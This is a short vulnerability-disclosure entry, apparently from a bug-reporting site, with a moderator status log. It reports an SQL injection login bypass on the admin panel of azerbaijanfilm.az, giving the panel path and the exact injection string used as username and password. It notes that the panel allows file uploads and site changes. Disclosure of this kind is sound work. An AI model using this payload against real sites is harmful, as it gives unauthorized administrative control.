SQL injection və admin bypass

azerbaijanfilm.az 01 November 2016, 20:55

Detailed information

panel admin_azfilm/index.php
username '=' 'or'
password '=' 'or'
panelden fayllar elave edib saytin strukturuna deyisiklikler etmek mumkundu

Comments

  • 16 December 2016, 14:41
    Vulnerability status
    Have not any information from source

  • 04 November 2016, 10:50
    Vulnerability status
    Sended e-mail to source about vulnerability

  • 02 November 2016, 12:58
    Added point to Vulnerability
    Moderator gave 7 point from 10 to vulnerability

  • 02 November 2016, 12:56
    Vulnerability status
    Confirmed by Moderator

  • 01 November 2016, 20:55
    Vulnerability added
    Vulnerability added to BUGemot